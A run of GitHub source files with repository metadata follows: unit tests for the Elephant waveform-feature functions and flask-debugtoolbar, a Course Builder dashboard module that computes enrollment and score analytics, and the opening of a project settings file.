"name": "JavaScript",
"bytes": "4915"
},
{
"name": "Python",
"bytes": "424135"
}
],
"symlink_target": ""
} |
"""
Unit tests for the waveform_features module.
:copyright: Copyright 2014-2020 by the Elephant team, see `doc/authors.rst`.
:license: Modified BSD, see LICENSE.txt for details.
"""
from __future__ import division
import unittest
import numpy as np
import quantities as pq
from numpy.testing import assert_array_almost_equal
from elephant import waveform_features
class WaveformWidthTestCase(unittest.TestCase):
    """Behavioral tests for waveform_features.waveform_width."""

    def setUp(self):
        # Representative spike waveform together with its known width
        # in samples.
        self.waveform = [
            29., 42., 41., 18., 24., 28., 34., 34., 9., -31., -100., -145.,
            -125., -88., -48., -18., 14., 36., 30., 33., -4., -25., -3., 30.,
            51., 47., 70., 76., 78., 57., 53., 49., 22., 15., 88., 109., 79.,
            68.]
        self.target_width = 24

    def test_list(self):
        # A plain Python list is accepted directly.
        self.assertEqual(
            waveform_features.waveform_width(self.waveform),
            self.target_width)

    def test_np_array(self):
        as_array = np.asarray(self.waveform)
        self.assertEqual(
            waveform_features.waveform_width(as_array), self.target_width)

    def test_pq_quantity(self):
        with_units = np.asarray(self.waveform) * pq.mV
        self.assertEqual(
            waveform_features.waveform_width(with_units), self.target_width)

    def test_np_array_2d(self):
        # Two-dimensional input must be rejected.
        stacked = np.vstack([self.waveform, self.waveform])
        self.assertRaises(ValueError, waveform_features.waveform_width,
                          stacked)

    def test_empty_list(self):
        self.assertRaises(ValueError, waveform_features.waveform_width, [])

    def test_cutoff(self):
        size = 10
        ramp = np.arange(size, dtype=float)
        # Cutoffs outside the [0, 1) range must be rejected.
        for bad_cutoff in (-1, 1):
            self.assertRaises(ValueError, waveform_features.waveform_width,
                              ramp, cutoff=bad_cutoff)
        # Any valid cutoff yields the full width for a monotonic ramp.
        for good_cutoff in np.linspace(0., 1., num=size, endpoint=False):
            self.assertEqual(
                waveform_features.waveform_width(ramp, cutoff=good_cutoff),
                size - 1)
class WaveformSignalToNoiseRatioTestCase(unittest.TestCase):
    """Behavioral tests for waveform_features.waveform_snr."""

    def test_zero_waveforms(self):
        # All-zero waveforms have zero noise, so the SNR is undefined:
        # the function should warn and return NaN.
        for shape in ((5, 10), (5, 1, 10), (5, 3, 10)):
            zero_wf = np.zeros(shape)
            with self.assertWarns(UserWarning):
                result = waveform_features.waveform_snr(zero_wf)
            self.assertTrue(np.all(np.isnan(result)))

    def test_waveforms_arange_single_spiketrain(self):
        target_snr = 0.9
        waveforms = np.arange(20).reshape((2, 1, 10))
        snr_float = waveform_features.waveform_snr(waveforms)
        self.assertIsInstance(snr_float, float)
        self.assertEqual(snr_float, target_snr)
        # A squeezed 2D input must give the same scalar result.
        self.assertEqual(waveform_features.waveform_snr(np.squeeze(waveforms)),
                         target_snr)

    def test_waveforms_arange_multiple_spiketrains(self):
        expected = [0.3, 0.3, 0.3]
        waveforms = np.arange(60).reshape((2, 3, 10))
        snr_per_unit = waveform_features.waveform_snr(waveforms)
        self.assertIsInstance(snr_per_unit, np.ndarray)
        assert_array_almost_equal(snr_per_unit, expected)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| {
"content_hash": "58c6bacea7db94a3841d5eb737c12da7",
"timestamp": "",
"source": "github",
"line_count": 92,
"max_line_length": 79,
"avg_line_length": 37.380434782608695,
"alnum_prop": 0.6025007269555103,
"repo_name": "mdenker/elephant",
"id": "aff400afa2c20489c662401f21d0b6d4a941da69",
"size": "3439",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "elephant/test/test_waveform_features.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11359"
},
{
"name": "C++",
"bytes": "92294"
},
{
"name": "Cuda",
"bytes": "21912"
},
{
"name": "Python",
"bytes": "1712932"
}
],
"symlink_target": ""
} |
import sys
import pytest
from flask_debugtoolbar import _printable
def load_app(name):
    """Import the named example module and return a test client for it."""
    module = __import__(name)
    flask_app = module.app
    flask_app.config['TESTING'] = True
    return flask_app.test_client()
def test_basic_app():
    """The index page renders and embeds the debug toolbar markup."""
    client = load_app('basic_app')
    response = client.get('/')
    assert response.status_code == 200
    assert b'<div id="flDebug"' in response.data
@pytest.mark.skipif(sys.version_info >= (3,),
                    reason='test only applies to Python 2')
def test_printable_unicode():
    """_printable reports reprs that cannot be ASCII-encoded."""
    class _UnicodeRepr(object):
        def __repr__(self):
            return u'\uffff'
    result = _printable(_UnicodeRepr())
    assert "raised UnicodeEncodeError: 'ascii' codec" in result
@pytest.mark.skipif(sys.version_info >= (3,),
                    reason='test only applies to Python 2')
def test_printable_non_ascii():
    """_printable replaces undecodable bytes with U+FFFD."""
    class _NonAsciiRepr(object):
        def __repr__(self):
            return 'a\xffb'
    # \xff cannot be decoded as ASCII, so it becomes the replacement char.
    assert u'%s' % _printable(_NonAsciiRepr()) == u'a\ufffdb'
| {
"content_hash": "94ffc04318f71eebdd166fa2c61f6787",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 66,
"avg_line_length": 25.70731707317073,
"alnum_prop": 0.6233396584440227,
"repo_name": "lepture/flask-debugtoolbar",
"id": "fd04ddc8f1b67461939b3b4019dadfcca2d54675",
"size": "1054",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "test/test_toolbar.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "11617"
},
{
"name": "JavaScript",
"bytes": "216298"
},
{
"name": "Makefile",
"bytes": "5741"
},
{
"name": "Python",
"bytes": "51944"
}
],
"symlink_target": ""
} |
"""Classes and methods to create and manage Courses."""
__author__ = 'Pavel Simakov (psimakov@google.com)'
import datetime
import os
import urllib
from common import jinja_filters
from common import safe_dom
from controllers import sites
from controllers.utils import ApplicationHandler
from controllers.utils import HUMAN_READABLE_TIME_FORMAT
from controllers.utils import ReflectiveRequestHandler
import jinja2
import jinja2.exceptions
from models import config
from models import courses
from models import custom_modules
from models import jobs
from models import roles
from models import transforms
from models import utils
from models import vfs
from models.models import Student
from models.models import ValidStudent
from models.models import StudentAnswersEntity
from course_settings import CourseSettingsHandler
from course_settings import CourseSettingsRESTHandler
import filer
from filer import AssetItemRESTHandler
from filer import AssetUriRESTHandler
from filer import FileManagerAndEditor
from filer import FilesItemRESTHandler
import messages
from peer_review import AssignmentManager
import unit_lesson_editor
from unit_lesson_editor import AssessmentRESTHandler
from unit_lesson_editor import ImportCourseRESTHandler
from unit_lesson_editor import LessonRESTHandler
from unit_lesson_editor import LinkRESTHandler
from unit_lesson_editor import UnitLessonEditor
from unit_lesson_editor import UnitLessonTitleRESTHandler
from unit_lesson_editor import UnitRESTHandler
from google.appengine.api import users
import logging
MODULE_QUESTIONS = [4,10,7,5,5,5,5,7,5,5,5,11,7]
class DashboardHandler(
    CourseSettingsHandler, FileManagerAndEditor, UnitLessonEditor,
    AssignmentManager, ApplicationHandler, ReflectiveRequestHandler):
    """Handles all pages and actions required for managing a course."""

    default_action = 'outline'
    # Actions reachable via GET; each maps to a get_<action> method.
    get_actions = [
        default_action, 'assets', 'settings', 'analytics',
        'edit_basic_settings', 'edit_settings', 'edit_unit_lesson',
        'edit_unit', 'edit_link', 'edit_lesson', 'edit_assessment',
        'add_asset', 'delete_asset', 'import_course', 'edit_assignment']
    # Requests to these handlers automatically go through an XSRF token check
    # that is implemented in ReflectiveRequestHandler.
    post_actions = [
        'compute_student_stats', 'create_or_edit_settings', 'add_unit',
        'add_link', 'add_assessment', 'add_lesson',
        'edit_basic_course_settings', 'add_reviewer', 'delete_reviewer']

    @classmethod
    def get_child_routes(cls):
        """Add child handlers for REST."""
        # Fix: AssetItemRESTHandler was registered twice; the duplicate
        # (identical) route entry has been removed.
        return [
            (AssessmentRESTHandler.URI, AssessmentRESTHandler),
            (AssetItemRESTHandler.URI, AssetItemRESTHandler),
            (CourseSettingsRESTHandler.URI, CourseSettingsRESTHandler),
            (FilesItemRESTHandler.URI, FilesItemRESTHandler),
            (AssetUriRESTHandler.URI, AssetUriRESTHandler),
            (ImportCourseRESTHandler.URI, ImportCourseRESTHandler),
            (LessonRESTHandler.URI, LessonRESTHandler),
            (LinkRESTHandler.URI, LinkRESTHandler),
            (UnitLessonTitleRESTHandler.URI, UnitLessonTitleRESTHandler),
            (UnitRESTHandler.URI, UnitRESTHandler),
        ]

    def can_view(self):
        """Checks if current user has viewing rights."""
        return roles.Roles.is_course_admin(self.app_context)

    def can_edit(self):
        """Checks if current user has editing rights."""
        return roles.Roles.is_course_admin(self.app_context)

    def get(self):
        """Enforces rights to all GET operations."""
        if not self.can_view():
            self.redirect(self.app_context.get_slug())
            return
        # Force reload of properties. It is expensive, but admin deserves it!
        config.Registry.get_overrides(force_update=True)
        return super(DashboardHandler, self).get()

    def post(self):
        """Enforces rights to all POST operations."""
        if not self.can_edit():
            self.redirect(self.app_context.get_slug())
            return
        return super(DashboardHandler, self).post()

    def get_template(self, template_name, dirs):
        """Sets up an environment and Gets jinja template."""
        jinja_environment = jinja2.Environment(
            autoescape=True, finalize=jinja_filters.finalize,
            loader=jinja2.FileSystemLoader(dirs + [os.path.dirname(__file__)]))
        jinja_environment.filters['js_string'] = jinja_filters.js_string
        return jinja_environment.get_template(template_name)

    def _get_alerts(self):
        """Returns a newline-joined string of course status warnings."""
        alerts = []
        if not courses.is_editable_fs(self.app_context):
            alerts.append('Read-only course.')
        if not self.app_context.now_available:
            alerts.append('The course is not publicly available.')
        return '\n'.join(alerts)

    def _get_top_nav(self):
        """Builds the dashboard's top navigation bar as safe DOM nodes."""
        current_action = self.request.get('action')
        nav_mappings = [
            ('', 'Outline'),
            ('assets', 'Assets'),
            ('settings', 'Settings'),
            ('analytics', 'Analytics'),
            ('edit_assignment', 'Peer Review')]
        nav = safe_dom.NodeList()
        for action, title in nav_mappings:
            class_name = 'selected' if action == current_action else ''
            action_href = 'dashboard?action=%s' % action
            nav.append(safe_dom.Element(
                'a', href=action_href, className=class_name).add_text(
                    title))
        if roles.Roles.is_super_admin():
            nav.append(safe_dom.Element(
                'a', href='/admin').add_text('Admin'))
        nav.append(safe_dom.Element(
            'a', href='https://code.google.com/p/course-builder/wiki/Dashboard',
            target='_blank').add_text('Help'))
        return nav

    def render_page(self, template_values):
        """Renders a page using provided template values."""
        template_values['top_nav'] = self._get_top_nav()
        template_values['gcb_course_base'] = self.get_base_href(self)
        template_values['user_nav'] = safe_dom.NodeList().append(
            safe_dom.Text('%s | ' % users.get_current_user().email())
        ).append(
            safe_dom.Element(
                'a', href=users.create_logout_url(self.request.uri)
            ).add_text('Logout'))
        template_values[
            'page_footer'] = 'Created on: %s' % datetime.datetime.now()
        if not template_values.get('sections'):
            template_values['sections'] = []
        self.response.write(
            self.get_template('view.html', []).render(template_values))

    def format_title(self, text):
        """Formats standard title."""
        title = self.app_context.get_environ()['course']['title']
        return safe_dom.NodeList().append(
            safe_dom.Text('Course Builder ')
        ).append(
            safe_dom.Entity('>')
        ).append(
            safe_dom.Text(' %s ' % title)
        ).append(
            safe_dom.Entity('>')
        ).append(
            safe_dom.Text(' Dashboard ')
        ).append(
            safe_dom.Entity('>')
        ).append(
            safe_dom.Text(' %s' % text)
        )

    def _get_edit_link(self, url):
        """Returns a small ' Edit' link node pointing at url."""
        return safe_dom.NodeList().append(
            safe_dom.Text(' ')
        ).append(
            safe_dom.Element('a', href=url).add_text('Edit')
        )

    def _get_availability(self, resource):
        """Returns a '(draft)' marker for resources not yet public."""
        if not hasattr(resource, 'now_available'):
            return safe_dom.Text('')
        if resource.now_available:
            return safe_dom.Text('')
        else:
            return safe_dom.NodeList().append(
                safe_dom.Text(' ')
            ).append(
                safe_dom.Element(
                    'span', className='draft-label'
                ).add_text('(%s)' % unit_lesson_editor.DRAFT_TEXT)
            )

    def render_course_outline_to_html(self):
        """Renders course outline to HTML."""
        course = courses.Course(self)
        if not course.get_units():
            return []
        is_editable = filer.is_editable_fs(self.app_context)
        lines = safe_dom.Element('ul', style='list-style: none;')
        # Unit types: 'A' = assessment, 'O' = link, 'U' = unit with lessons.
        for unit in course.get_units():
            if unit.type == 'A':
                li = safe_dom.Element('li').add_child(
                    safe_dom.Element(
                        'a', href='assessment?name=%s' % unit.unit_id,
                        className='strong'
                    ).add_text(unit.title)
                ).add_child(self._get_availability(unit))
                if is_editable:
                    url = self.canonicalize_url(
                        '/dashboard?%s') % urllib.urlencode({
                            'action': 'edit_assessment',
                            'key': unit.unit_id})
                    li.add_child(self._get_edit_link(url))
                lines.add_child(li)
                continue
            if unit.type == 'O':
                li = safe_dom.Element('li').add_child(
                    safe_dom.Element(
                        'a', href=unit.href, className='strong'
                    ).add_text(unit.title)
                ).add_child(self._get_availability(unit))
                if is_editable:
                    url = self.canonicalize_url(
                        '/dashboard?%s') % urllib.urlencode({
                            'action': 'edit_link',
                            'key': unit.unit_id})
                    li.add_child(self._get_edit_link(url))
                lines.add_child(li)
                continue
            if unit.type == 'U':
                li = safe_dom.Element('li').add_child(
                    safe_dom.Element(
                        'a', href='unit?unit=%s' % unit.unit_id,
                        className='strong').add_text(
                            'Unit %s - %s' % (unit.index, unit.title))
                ).add_child(self._get_availability(unit))
                if is_editable:
                    url = self.canonicalize_url(
                        '/dashboard?%s') % urllib.urlencode({
                            'action': 'edit_unit',
                            'key': unit.unit_id})
                    li.add_child(self._get_edit_link(url))
                ol = safe_dom.Element('ol')
                for lesson in course.get_lessons(unit.unit_id):
                    li2 = safe_dom.Element('li').add_child(
                        safe_dom.Element(
                            'a',
                            href='unit?unit=%s&lesson=%s' % (
                                unit.unit_id, lesson.lesson_id),
                        ).add_text(lesson.title)
                    ).add_child(self._get_availability(lesson))
                    if is_editable:
                        url = self.get_action_url(
                            'edit_lesson', key=lesson.lesson_id)
                        li2.add_child(self._get_edit_link(url))
                    ol.add_child(li2)
                li.add_child(ol)
                lines.add_child(li)
                continue
            raise Exception('Unknown unit type: %s.' % unit.type)
        return lines

    def get_outline(self):
        """Renders course outline view."""
        pages_info = [
            safe_dom.Element(
                'a', href=self.canonicalize_url('/announcements')
            ).add_text('Announcements'),
            safe_dom.Element(
                'a', href=self.canonicalize_url('/course')
            ).add_text('Course')]
        outline_actions = []
        if filer.is_editable_fs(self.app_context):
            outline_actions.append({
                'id': 'edit_unit_lesson',
                'caption': 'Organize',
                'href': self.get_action_url('edit_unit_lesson')})
            outline_actions.append({
                'id': 'add_lesson',
                'caption': 'Add Lesson',
                'action': self.get_action_url('add_lesson'),
                'xsrf_token': self.create_xsrf_token('add_lesson')})
            outline_actions.append({
                'id': 'add_unit',
                'caption': 'Add Unit',
                'action': self.get_action_url('add_unit'),
                'xsrf_token': self.create_xsrf_token('add_unit')})
            outline_actions.append({
                'id': 'add_link',
                'caption': 'Add Link',
                'action': self.get_action_url('add_link'),
                'xsrf_token': self.create_xsrf_token('add_link')})
            outline_actions.append({
                'id': 'add_assessment',
                'caption': 'Add Assessment',
                'action': self.get_action_url('add_assessment'),
                'xsrf_token': self.create_xsrf_token('add_assessment')})
            # Importing is only offered while the course is still empty.
            if not courses.Course(self).get_units():
                outline_actions.append({
                    'id': 'import_course',
                    'caption': 'Import',
                    'href': self.get_action_url('import_course')
                    })
        data_info = self.list_files('/data/')
        sections = [
            {
                'title': 'Pages',
                'description': messages.PAGES_DESCRIPTION,
                'children': pages_info},
            {
                'title': 'Course Outline',
                'description': messages.COURSE_OUTLINE_DESCRIPTION,
                'actions': outline_actions,
                'pre': self.render_course_outline_to_html()},
            {
                'title': 'Data Files',
                'description': messages.DATA_FILES_DESCRIPTION,
                'children': data_info}]
        template_values = {}
        template_values['page_title'] = self.format_title('Outline')
        template_values['alerts'] = self._get_alerts()
        template_values['sections'] = sections
        self.render_page(template_values)

    def get_action_url(self, action, key=None, extra_args=None):
        """Builds a canonical /dashboard URL for the given action."""
        args = {'action': action}
        if key:
            args['key'] = key
        if extra_args:
            args.update(extra_args)
        url = '/dashboard?%s' % urllib.urlencode(args)
        return self.canonicalize_url(url)

    def get_settings(self):
        """Renders course settings view."""
        yaml_actions = []
        basic_setting_actions = []
        # Basic course info.
        course_info = [
            'Course Title: %s' % self.app_context.get_environ()['course'][
                'title'],
            'Context Path: %s' % self.app_context.get_slug(),
            'Datastore Namespace: %s' % self.app_context.get_namespace_name()]
        # Course file system.
        fs = self.app_context.fs.impl
        course_info.append(('File System: %s' % fs.__class__.__name__))
        if fs.__class__ == vfs.LocalReadOnlyFileSystem:
            course_info.append(('Home Folder: %s' % sites.abspath(
                self.app_context.get_home_folder(), '/')))
        # Enable editing if supported.
        if filer.is_editable_fs(self.app_context):
            yaml_actions.append({
                'id': 'edit_course_yaml',
                'caption': 'Advanced Edit',
                'action': self.get_action_url('create_or_edit_settings'),
                'xsrf_token': self.create_xsrf_token(
                    'create_or_edit_settings')})
            yaml_actions.append({
                'id': 'edit_basic_course_settings',
                'caption': 'Edit',
                'action': self.get_action_url('edit_basic_course_settings'),
                'xsrf_token': self.create_xsrf_token(
                    'edit_basic_course_settings')})
        # Yaml file content.
        yaml_info = []
        yaml_stream = self.app_context.fs.open(
            self.app_context.get_config_filename())
        if yaml_stream:
            yaml_lines = yaml_stream.read().decode('utf-8')
            for line in yaml_lines.split('\n'):
                yaml_info.append(line)
        else:
            yaml_info.append('< empty file >')
        # Prepare template values.
        template_values = {}
        template_values['page_title'] = self.format_title('Settings')
        template_values['page_description'] = messages.SETTINGS_DESCRIPTION
        template_values['sections'] = [
            {
                'title': 'About the Course',
                'description': messages.ABOUT_THE_COURSE_DESCRIPTION,
                'actions': basic_setting_actions,
                'children': course_info},
            {
                'title': 'Contents of course.yaml file',
                'description': messages.CONTENTS_OF_THE_COURSE_DESCRIPTION,
                'actions': yaml_actions,
                'children': yaml_info}]
        self.render_page(template_values)

    def list_files(self, subfolder):
        """Makes a list of files in a subfolder."""
        home = sites.abspath(self.app_context.get_home_folder(), '/')
        files = self.app_context.fs.list(
            sites.abspath(self.app_context.get_home_folder(), subfolder))
        result = []
        for abs_filename in sorted(files):
            filename = os.path.relpath(abs_filename, home)
            result.append(vfs.AbstractFileSystem.normpath(filename))
        return result

    def list_and_format_file_list(
        self, title, subfolder,
        links=False, upload=False, prefix=None, caption_if_empty='< none >',
        edit_url_template=None, sub_title=None):
        """Walks files in folders and renders their names in a section."""
        items = safe_dom.NodeList()
        count = 0
        for filename in self.list_files(subfolder):
            if prefix and not filename.startswith(prefix):
                continue
            li = safe_dom.Element('li')
            if links:
                li.add_child(safe_dom.Element(
                    'a', href=urllib.quote(filename)).add_text(filename))
                if edit_url_template:
                    edit_url = edit_url_template % urllib.quote(filename)
                    li.add_child(
                        safe_dom.Entity('&nbsp;')
                    ).add_child(
                        safe_dom.Element('a', href=edit_url).add_text('[Edit]'))
            else:
                li.add_text(filename)
            count += 1
            items.append(li)
        output = safe_dom.NodeList()
        if filer.is_editable_fs(self.app_context) and upload:
            output.append(
                safe_dom.Element(
                    'a', className='gcb-button gcb-pull-right',
                    href='dashboard?%s' % urllib.urlencode(
                        {'action': 'add_asset', 'base': subfolder})
                ).add_text('Upload')
            ).append(
                safe_dom.Element('div', style='clear: both; padding-top: 2px;'))
        if title:
            h3 = safe_dom.Element('h3')
            if count:
                h3.add_text('%s (%s)' % (title, count))
            else:
                h3.add_text(title)
            output.append(h3)
        if sub_title:
            output.append(safe_dom.Element('blockquote').add_text(sub_title))
        if items:
            output.append(safe_dom.Element('ol').add_children(items))
        else:
            if caption_if_empty:
                output.append(
                    safe_dom.Element('blockquote').add_text(caption_if_empty))
        return output

    def get_assets(self):
        """Renders course assets view."""

        def inherits_from(folder):
            return '< inherited from %s >' % folder

        items = safe_dom.NodeList().append(
            self.list_and_format_file_list(
                'Assessments', '/assets/js/', links=True,
                prefix='assets/js/assessment-')
        ).append(
            self.list_and_format_file_list(
                'Activities', '/assets/js/', links=True,
                prefix='assets/js/activity-')
        ).append(
            self.list_and_format_file_list(
                'Images & Documents', '/assets/img/', links=True, upload=True,
                edit_url_template='dashboard?action=delete_asset&uri=%s',
                sub_title='< inherited from /assets/img/ >',
                caption_if_empty=None)
        ).append(
            self.list_and_format_file_list(
                'Cascading Style Sheets', '/assets/css/', links=True,
                caption_if_empty=inherits_from('/assets/css/'))
        ).append(
            self.list_and_format_file_list(
                'JavaScript Libraries', '/assets/lib/', links=True,
                caption_if_empty=inherits_from('/assets/lib/'))
        ).append(
            self.list_and_format_file_list(
                'View Templates', '/views/',
                caption_if_empty=inherits_from('/views/'))
        )
        template_values = {}
        template_values['page_title'] = self.format_title('Assets')
        template_values['page_description'] = messages.ASSETS_DESCRIPTION
        template_values['main_content'] = items
        self.render_page(template_values)

    def get_markup_for_basic_analytics(self, job):
        """Renders markup for basic enrollment and assessment analytics."""
        subtemplate_values = {}
        errors = []
        stats_calculated = False
        update_message = safe_dom.Text('')
        if not job:
            update_message = safe_dom.Text(
                'Enrollment/assessment statistics have not been calculated '
                'yet.')
        else:
            if job.status_code == jobs.STATUS_CODE_COMPLETED:
                stats = transforms.loads(job.output)
                stats_calculated = True
                subtemplate_values['enrolled'] = stats['enrollment']['enrolled']
                subtemplate_values['unenrolled'] = (
                    stats['enrollment']['unenrolled'])
                scores = []
                total_records = 0
                # 'scores' values are (count, score_sum) tuples per
                # assessment; see ScoresAggregator.
                for key, value in stats['scores'].items():
                    total_records += value[0]
                    avg = round(value[1] / value[0], 1) if value[0] else 0
                    scores.append({'key': key, 'completed': value[0],
                                   'avg': avg})
                subtemplate_values['scores'] = scores
                subtemplate_values['total_records'] = total_records
                # student scores - wopg
                s_scores = []
                for key, value0 in stats['students'].items():
                    lin = []
                    for key1 in ['a1course', 'a2course', 'a3course','a4course','a5course','a6course','a7course','a8course','a9course','a10course','a11course','a12course','postcourse', 'overall_score']:
                        if key1 in value0.keys():
                            lin.append(value0[key1])
                        else:
                            lin.append(0)
                    s_scores.append({'key': key, 'scores': lin})
                subtemplate_values['students'] = s_scores
                # student feedback - wopg
                s_feed = []
                for key, value in stats['feedback'].items():
                    s_feed.append({'key': key, 'value': value})
                subtemplate_values['feedback'] = s_feed
                update_message = safe_dom.Text("""
                    Enrollment and assessment statistics were last updated at
                    %s in about %s second(s).""" % (
                        job.updated_on.strftime(HUMAN_READABLE_TIME_FORMAT),
                        job.execution_time_sec))
            elif job.status_code == jobs.STATUS_CODE_FAILED:
                update_message = safe_dom.NodeList().append(
                    safe_dom.Text("""
                        There was an error updating enrollment/assessment
                        statistics. Here is the message:""")
                ).append(
                    safe_dom.Element('br')
                ).append(
                    safe_dom.Element('blockquote').add_child(
                        safe_dom.Element('pre').add_text('\n%s' % job.output)))
            else:
                update_message = safe_dom.Text(
                    'Enrollment and assessment statistics update started at %s'
                    ' and is running now. Please come back shortly.' %
                    job.updated_on.strftime(HUMAN_READABLE_TIME_FORMAT))
        subtemplate_values['stats_calculated'] = stats_calculated
        subtemplate_values['errors'] = errors
        subtemplate_values['update_message'] = update_message
        return jinja2.utils.Markup(self.get_template(
            'basic_analytics.html', [os.path.dirname(__file__)]
        ).render(subtemplate_values, autoescape=True))

    def get_analytics(self):
        """Renders course analytics view."""
        template_values = {}
        template_values['page_title'] = self.format_title('Analytics')
        at_least_one_job_exists = False
        at_least_one_job_finished = False
        basic_analytics_job = ComputeStudentStats(self.app_context).load()
        stats_html = self.get_markup_for_basic_analytics(basic_analytics_job)
        if basic_analytics_job:
            at_least_one_job_exists = True
            if basic_analytics_job.status_code == jobs.STATUS_CODE_COMPLETED:
                at_least_one_job_finished = True
        # Append sections provided by custom analytics handlers.
        for callback in DashboardRegistry.analytics_handlers:
            handler = callback()
            handler.app_context = self.app_context
            handler.request = self.request
            handler.response = self.response
            job = handler.stats_computer(self.app_context).load()
            stats_html += handler.get_markup(job)
            if job:
                at_least_one_job_exists = True
                if job.status_code == jobs.STATUS_CODE_COMPLETED:
                    at_least_one_job_finished = True
        template_values['main_content'] = jinja2.utils.Markup(self.get_template(
            'analytics.html', [os.path.dirname(__file__)]
        ).render({
            'show_recalculate_button': (
                at_least_one_job_finished or not at_least_one_job_exists),
            'stats_html': stats_html,
            'xsrf_token': self.create_xsrf_token('compute_student_stats'),
        }, autoescape=True))
        self.render_page(template_values)

    def post_compute_student_stats(self):
        """Submits a new student statistics calculation task."""
        job = ComputeStudentStats(self.app_context)
        job.submit()
        # Kick off any custom analytics jobs as well.
        for callback in DashboardRegistry.analytics_handlers:
            job = callback().stats_computer(self.app_context)
            job.submit()
        self.redirect('/dashboard?action=analytics')
class ScoresAggregator(object):
    """Aggregates scores statistics."""

    # Data is stored as tuples keyed by the assessment type name:
    # (student_count, sum_of_scores).
    def __init__(self):
        self.name_to_tuple = {}

    def visit(self, student):
        """Fold one student's scores into the running totals."""
        if not student.scores:
            return
        decoded = transforms.loads(student.scores)
        for name in decoded.keys():
            count, score_sum = self.name_to_tuple.get(name, (0, 0))
            self.name_to_tuple[name] = (
                count + 1, score_sum + float(decoded[name]))
class StudentAggregator(object):
    """Aggregates per-student scores for all exercises.

    name_to_tuple maps a "user_id,name,profile" key to the student's
    decoded scores dict. (Dead commented-out code removed.)
    """

    def __init__(self):
        self.name_to_tuple = {}

    def visit(self, student):
        """Record the decoded scores of one student, if any."""
        if student.scores:
            scores = transforms.loads(student.scores)
            valid = ValidStudent.get_valid(student.key().name())
            # Key rows by user id, display name and profile kind.
            chave = student.user_id + "," + student.name + "," + valid.profile
            self.name_to_tuple[chave] = scores
class PostcourseAggregator(object):
    """Collects per-question answers for every student and assessment.

    name_to_tuple maps "<student key>,<assessment name>" to a list of
    per-question values: the 'correct' flag for regular assessments and
    the raw 'value' for the 'postcourse' survey.
    """

    def __init__(self):
        self.name_to_tuple = {}

    def visit(self, student):
        """Fold one StudentAnswersEntity into the aggregate."""
        answers = transforms.loads(student.data)
        # Question counts per assessment, aligned with MODULE_QUESTIONS
        # (a1course..a12course followed by postcourse). Built once per
        # visit instead of once per answer key as before.
        names = ['a%dcourse' % i for i in range(1, 13)] + ['postcourse']
        limits = dict(zip(names, MODULE_QUESTIONS))
        for key in answers.keys():
            per_question = answers[key]
            values = []
            for i in range(0, limits[key]):
                # Fix: replaced the Python-2-only '<>' operator with '!='.
                if key != 'postcourse':
                    values.append(per_question[i]['correct'])
                else:
                    values.append(per_question[i]['value'])
            chave = student.key().name() + ',' + key
            self.name_to_tuple[chave] = values
class EnrollmentAggregator(object):
    """Aggregates enrollment statistics."""

    def __init__(self):
        self.enrolled = 0
        self.unenrolled = 0

    def visit(self, student):
        """Tally one student into the matching bucket."""
        bucket = 'enrolled' if student.is_enrolled else 'unenrolled'
        setattr(self, bucket, getattr(self, bucket) + 1)
class ComputeStudentStats(jobs.DurableJob):
    """A job that computes student statistics."""
    def run(self):
        """Computes student statistics."""
        # One aggregator per statistic; each visit() folds in one row.
        enrollment = EnrollmentAggregator()
        scores = ScoresAggregator()
        student_scores = StudentAggregator()
        feedback = PostcourseAggregator()
        # First pass: stream all Student rows through the aggregators.
        mapper = utils.QueryMapper(
            Student.all(), batch_size=500, report_every=1000)
        def map_fn(student):
            enrollment.visit(student)
            scores.visit(student)
            student_scores.visit(student)
        mapper.run(map_fn)
        # Second pass: per-question feedback from the answers table.
        mapper = utils.QueryMapper(
            StudentAnswersEntity.all(), batch_size=500, report_every=1000)
        def map_fn1(student):
            feedback.visit(student)
        mapper.run(map_fn1)
        # Shape matches what get_markup_for_basic_analytics expects.
        data = {
            'enrollment': {
                'enrolled': enrollment.enrolled,
                'unenrolled': enrollment.unenrolled},
            'scores': scores.name_to_tuple,
            'students' : student_scores.name_to_tuple,
            'feedback' : feedback.name_to_tuple}
        return data
class DashboardRegistry(object):
    """Holds registered handlers that produce HTML code for the dashboard."""
    analytics_handlers = []

    @classmethod
    def add_custom_analytics_section(cls, handler):
        """Adds handlers that provide additional data for the Analytics page."""
        if handler in cls.analytics_handlers:
            # Re-registering the same handler is a harmless no-op.
            return
        # The built-in section names are reserved in addition to any
        # names already taken by registered handlers.
        reserved = set(h.name for h in cls.analytics_handlers)
        reserved.update(('enrollment', 'scores', 'students', 'feedback'))
        if handler.name in reserved:
            raise Exception('Stats handler name %s is being duplicated.'
                            % handler.name)
        cls.analytics_handlers.append(handler)
custom_module = None
def register_module():
    """Registers this module in the registry."""
    global custom_module
    handlers = [('/dashboard', DashboardHandler)]
    custom_module = custom_modules.Module(
        'Course Dashboard',
        'A set of pages for managing Course Builder course.',
        [], handlers)
    return custom_module
| {
"content_hash": "4fc2129a73593af2fb6a1967a626e922",
"timestamp": "",
"source": "github",
"line_count": 821,
"max_line_length": 187,
"avg_line_length": 38.66991473812424,
"alnum_prop": 0.5514678089958422,
"repo_name": "ksh/gpitrainingv2",
"id": "ca6f23d34fa59ff3832eff1152cb8b7d4a5bda2a",
"size": "32346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/dashboard/dashboard.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "396865"
},
{
"name": "Python",
"bytes": "952535"
}
],
"symlink_target": ""
} |
import os.path
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
PROJECT_NAME = os.path.basename(ROOT_DIR)
def ABS_PATH(*args):
    """Return an absolute path: *args joined onto the project root.

    ROOT_DIR is computed at import time from this settings file's location.
    """
    return os.path.join(ROOT_DIR, *args)
def ENV_SETTING(key, default):
    """Return the value of environment variable ``key``, or ``default`` if unset.

    The function-local ``import os`` was removed: ``import os.path`` at the
    top of this module already binds the ``os`` name, so the re-import was
    redundant.
    """
    return os.environ.get(key, default)
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
LANGUAGES = (
('en', 'English'),
('sv_SE', 'Swedish')
)
